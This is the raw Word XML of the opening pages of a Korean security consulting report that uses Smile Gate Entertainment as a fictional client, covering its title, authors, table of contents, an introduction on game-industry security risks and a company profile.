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Pr="00C05256" w:rsidRDefault="00C05256" w:rsidP="0089125C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>가상 회사 보안 컨설팅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C05256" w:rsidRPr="00C05256" w:rsidRDefault="00C05256" w:rsidP="00C05256">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05256">
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>mile Gate Entertainment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C05256" w:rsidP="0089125C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>곽준희,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>김동은,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>유승호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19376E" w:rsidRPr="002C1FCE" w:rsidRDefault="0089125C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRPr="00664540" w:rsidRDefault="002C1FCE" w:rsidP="0089125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목 차</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1DA7" w:rsidRPr="001E2DD9" w:rsidRDefault="001E2DD9" w:rsidP="001E2DD9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1E2DD9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>서론</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRPr="00664540" w:rsidRDefault="0089125C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컨설팅 의뢰 가상 회사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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회사 소개</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>--------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>---4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00863AB2" w:rsidRDefault="004F56F1" w:rsidP="009E6C11">
      <w:pPr>
        <w:pStyle w:val="af0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조직도 및 네트워크 구성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조직도 </w:t>
      </w:r>
      <w:r>
        <w:t>---------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:t>--------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRDefault="009E6C11" w:rsidP="00CD0B2D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네트워크 구성 </w:t>
      </w:r>
      <w:r>
        <w:t>--------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>------7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="009E6C11" w:rsidRDefault="004F56F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9E6C11" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>의뢰 요청 시나리오 및 요구 사항</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t xml:space="preserve"> -----------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>----------------------------8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRPr="00664540" w:rsidRDefault="009E6C11" w:rsidP="0089125C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모의 해킹</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRDefault="009E6C11" w:rsidP="009E6C11">
      <w:pPr>
        <w:ind w:firstLine="760"/>
      </w:pPr>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004F56F1">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="0089125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">해킹 </w:t>
      </w:r>
      <w:r w:rsidR="0089125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PC </w:t>
      </w:r>
      <w:r w:rsidR="0089125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>상태 점검</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>-9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9125C" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>보안점검 체크리스트</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t xml:space="preserve"> ------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>---------9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00863AB2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863AB2" w:rsidRPr="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>일정</w:t>
      </w:r>
      <w:r w:rsidR="00863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00863AB2">
        <w:t>-------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>-------------------------------10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">C </w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>현황 점검</w:t>
      </w:r>
      <w:r w:rsidR="00E970E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>------------------------------------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>-11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00632150" w:rsidRDefault="004F56F1" w:rsidP="00CD0B2D">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00632150" w:rsidRPr="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>모의해킹 실시</w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00632150">
        <w:t>--------------------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>----------------------------13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRPr="00664540" w:rsidRDefault="0089125C" w:rsidP="009E6C11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t>보안 설정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863AB2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>새로 구성된 토폴로지</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>----------------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>-----------------------------54</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0089125C" w:rsidRDefault="0089125C" w:rsidP="00706A82">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>발견된 취약점에 대한 방어</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>----------------------</w:t>
      </w:r>
      <w:r w:rsidR="00ED7558">
        <w:t>----------------------------55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E08A0" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:pStyle w:val="af0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t>결론</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E2DD9" w:rsidRDefault="001E2DD9" w:rsidP="001E2DD9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서론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현재 게임은 단순히 시간을 보내기 위한 수단 그 이상의 가치를 가지고 규모와 질적인 측면에서 상당히 많은 성장을 보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소규모의 자본과 인력으로도 충분히 성공을 거둘 수도 있는 산업의 특성상 다수의 게임회사들이 늘어났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에 비해 보안에 대해서는 관심이 비교적 적었던 것이 사실입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이용하기 위한 개인정보가 해킹으로 유출되거나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계정을 탈취해서 게임 내 이득을 가로채는 것뿐 만 아니라 게임 서버 자체를 공격하거나 게임 데이터를 해킹해서 조작을 하는 등 다양한 공격 사례가 있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ab/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내 데이터를 조작해서 게임을 원하는 대로 또는 편하게 변경하는 것도 게임을 개발한 개발자의 지적재산권을 침해하는 부당한 행위이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을 제공하는 회사가 해킹 공격을 당한다면 단순히 게임 내에서 부당한 이득이 발생하는 것을 떠나서 회사와 게임 사용자에게도 피해가 될 수 있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게임 내에서 세금을 제때 내지 않아 발생한 전쟁으로 실제 현금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3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억원 이상의 가치가 사라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게임 아이템 하나가 억대에 거래가 되기도 하는 지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그 규모의 크고 작음을 떠나서 게임 C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ontents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 자체에 대한 투자뿐 아니라 보안에 문제가 생기지 않도록 반드시 대비할 필요가 있습니다.</w:t>
      </w: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</w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="760"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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따라서 본 프로젝트는 현재 지속적인 성장을 보이고 있고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,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새로운 게임을 출시할 예정에 있는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사에 속한 계열사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mile Gate Entertainment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를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가상 회사로 설정하여 현재 서비스 중인 게임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>SoulWorker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의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관리를 위해서 분리되었다는 상황을 가정하였습니다.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 xml:space="preserve">전체 프로젝트는 회사 내 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PC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 점검과 모의 해킹 및 대응으로 이루어지고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배웠던 내용이 특정 산업에 특수하게 적용되는 수준으로 보여질 수 있는 없겠지만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시스템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웹 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DB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보안,</w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00706A82">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>네트워크 보안으로 분류된 공격들을 통해서 게임회사에서 중요하게 다루어져야 할 계정 및 권한에 관한 공격과 웹 서버에 대한 공격 등 게임회사에서 빈번하게 발생할 수 있는 이슈에 대해서 점검하고 취약점을 보완하는 과정을 진행하였습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00706A82" w:rsidRPr="00706A82" w:rsidRDefault="00706A82" w:rsidP="00706A82">
      <w:pPr>
        <w:ind w:left="400"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001E2DD9" w:rsidRDefault="001E2DD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D5B99" w:rsidRPr="00664540" w:rsidRDefault="009E6C11" w:rsidP="00CD0B2D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664540">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안 컨설팅 의뢰 가상 회사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회사 소개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273ABB0E" wp14:editId="51DEFF00">
            <wp:extent cx="4593438" cy="149542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DBD091-2649-4418-A518-2597ECF06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DBD091-2649-4418-A518-2597ECF06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16" cy="15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11">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E063584" wp14:editId="2F3FF7D9">
            <wp:extent cx="4562475" cy="1982722"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="그림 1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23AD77-EA35-4E3E-88C0-E21E8BAEA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매우 높은 신뢰도로 생성된 설명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23AD77-EA35-4E3E-88C0-E21E8BAEA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2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9" w:rsidRDefault="006F136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의뢰 회사의 그룹사인 </w:t>
      </w:r>
      <w:r>
        <w:t>Smile</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Gate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">즐거움을 함께 나눌 수 있는 통로가 되겠다는 모토로 회사명을 </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>Smile</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>Gate</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 정하고 이후 매해 지속적으로 발전해온 회사</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRDefault="009E6C11" w:rsidP="009E6C11">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009E6C11">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B0F2A66" wp14:editId="2E85C5C6">
            <wp:extent cx="4150995" cy="2503714"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="12" name="그림 1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27BA85-1F25-4E87-AD47-9692CB6E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스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명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027BA85-1F25-4E87-AD47-9692CB6E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80" cy="25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A0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 w:rsidR="006F1364">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 자체적으로</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 개발</w:t>
      </w:r>
      <w:r w:rsidR="006F1364">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">할 뿐 아니라 다른 회사의 게임을 </w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:t>Publishing</w:t>
      </w:r>
      <w:r w:rsidR="006F1364">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하거나</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 투자</w:t>
      </w:r>
      <w:r w:rsidR="006F1364">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>하는 사업을 운영</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90AE2" w:rsidRDefault="00C90AE2" w:rsidP="002E08A0">
      <w:pPr>
        <w:ind w:firstLine="400"/>
      </w:pPr>
      <w:r w:rsidRPr="00C90AE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86350" cy="3704590"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"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704590"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="7995183" cy="5070773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A7F3822-573D-48A6-B5E0-5156CE44A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09"/>
                            <a:ext cx="3781493" cy="2634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CDAAFFE-222B-4A03-B02D-A90EF84FA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168" y="0"/>
                            <a:ext cx="3981072" cy="1258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0753ABE-C0EF-4A25-B756-C642DC35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3" y="2578944"/>
                            <a:ext cx="3981072" cy="249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 descr="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명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90828C7-7C8F-42AF-A65A-1417E8ECD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4111" y="2629972"/>
                            <a:ext cx="3981072" cy="1544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617685" id="그룹 3" o:spid="_x0000_s1026" style="width:400.5pt;height:291.7pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="79951,5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스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명" style="position:absolute;top:623;width:37814;height:2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iTLBAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj0GLwjAUhO/C/ofwhL1pqodFu0bRhYLs&#10;Raz2/rZ5tsXmpTRRs/56Iwgeh5n5hlmsgmnFlXrXWFYwGScgiEurG64UHA/ZaAbCeWSNrWVS8E8O&#10;VsuPwQJTbW+8p2vuKxEh7FJUUHvfpVK6siaDbmw74uidbG/QR9lXUvd4i3DTymmSfEmDDceFGjv6&#10;qak85xejwP4Vpqjmv3kbdtm8C5tC32eZUp/DsP4G4Sn4d/jV3moFU3hei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riTLBAAAA2gAAAA8AAAAAAAAAAAAAAAAAnwIA&#10;AGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACNAwAAAAA=&#10;">
                  <v:imagedata r:id="rId16" o:title="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="그림 3" o:spid="_x0000_s1028" type="#_x0000_t75" alt="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명" style="position:absolute;left:39611;width:39811;height:1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BnrEAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrAjEUhO+F/ofwBG81q4K0q1kRa0EP&#10;Pag99PjYPDe7bl7WJNW1v74pFHocZuYbZrHsbSuu5EPtWMF4lIEgLp2uuVLwcXx7egYRIrLG1jEp&#10;uFOAZfH4sMBcuxvv6XqIlUgQDjkqMDF2uZShNGQxjFxHnLyT8xZjkr6S2uMtwW0rJ1k2kxZrTgsG&#10;O1obKs+HL6ug32eXl8v7and89d/rT8PN5iQbpYaDfjUHEamP/+G/9lYrmML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BnrEAAAA2gAAAA8AAAAAAAAAAAAAAAAA&#10;nwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPcAAACQAwAAAAA=&#10;">
                  <v:imagedata r:id="rId17" o:title="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="그림 5" o:spid="_x0000_s1029" type="#_x0000_t75" alt="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명" style="position:absolute;left:104;top:25789;width:39811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FFfDAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj0FrwkAUhO8F/8PyCr3VTSwpGt2EINT2&#10;qFbE4yP7TGKzb0N2m6T/visUehxm5htmk0+mFQP1rrGsIJ5HIIhLqxuuFJw+356XIJxH1thaJgU/&#10;5CDPZg8bTLUd+UDD0VciQNilqKD2vkuldGVNBt3cdsTBu9reoA+yr6TucQxw08pFFL1Kgw2HhRo7&#10;2tZUfh2/jQK9qw7n7fASl5diZXC/41sSvSv19DgVaxCeJv8f/mt/aAUJ3K+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UV8MAAADaAAAADwAAAAAAAAAAAAAAAACf&#10;AgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAI8DAAAAAA==&#10;">
                  <v:imagedata r:id="rId18" o:title="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="그림 6" o:spid="_x0000_s1030" type="#_x0000_t75" alt="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명" style="position:absolute;left:40141;top:26299;width:39810;height:1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dTDAAAA2gAAAA8AAABkcnMvZG93bnJldi54bWxEj09rAjEUxO8Fv0N4Qm81aw8iq1FEsQi2&#10;2Kr45/bYPDeLm5dlk67rtzdCocdhZn7DjKetLUVDtS8cK+j3EhDEmdMF5wr2u+XbEIQPyBpLx6Tg&#10;Th6mk87LGFPtbvxDzTbkIkLYp6jAhFClUvrMkEXfcxVx9C6uthiirHOpa7xFuC3le5IMpMWC44LB&#10;iuaGsuv21yoov9fHr+b8cSDX4qLQJ/lpNhulXrvtbAQiUBv+w3/tlVYwgO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Rx1MMAAADaAAAADwAAAAAAAAAAAAAAAACf&#10;AgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9wAAAI8DAAAAAA==&#10;">
                  <v:imagedata r:id="rId19" o:title="스크린샷이(가) 표시된 사진&#10;&#10;매우 높은 신뢰도로 생성된 설명"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C90AE2" w:rsidRDefault="00C90AE2" w:rsidP="00C90AE2"/>
    <w:p w:rsidR="009E6C11" w:rsidRDefault="009E6C11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 w:rsidR="00CD5B99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에 출시한</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CROSSFIRE </w:t>
      </w:r>
      <w:r w:rsidR="00CD5B99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 중국에서 큰 흥행을 하고</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이후 C</w:t>
      </w:r>
      <w:r>
        <w:t>ROSSFIRE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 최대 동시 접속</w:t>
      </w:r>
      <w:r w:rsidR="002E08A0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>자 수로 중국 기네스북에 등재,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WCG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>종목 채택</w:t>
      </w:r>
      <w:r w:rsidR="00CD5B99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">되는 등 </w:t>
      </w:r>
      <w:r w:rsidR="00CD5B99">
        <w:t>CROSSFIRE</w:t>
      </w:r>
      <w:r w:rsidR="00CD5B99">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 인한 매출이 상승 이를 기반으로 회사가 성장</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009E6C11" w:rsidRDefault="00CD5B99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ROSSFIRE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>흥행 이후 성장세를 이어가기 위해서 최근 국내에서 호응을 얻지 못하고 있는</w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:t>MMORPG</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>장르 개발에 돌입</w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">해서 </w:t>
      </w:r>
      <w:r>
        <w:t>2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">년 </w:t>
      </w:r>
      <w:r w:rsidR="009E6C11">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로스트아크 </w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1차 </w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:t>CBT</w:t>
      </w:r>
      <w:r w:rsidR="00C90AE2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 실시했고 현재 최종 </w:t>
      </w:r>
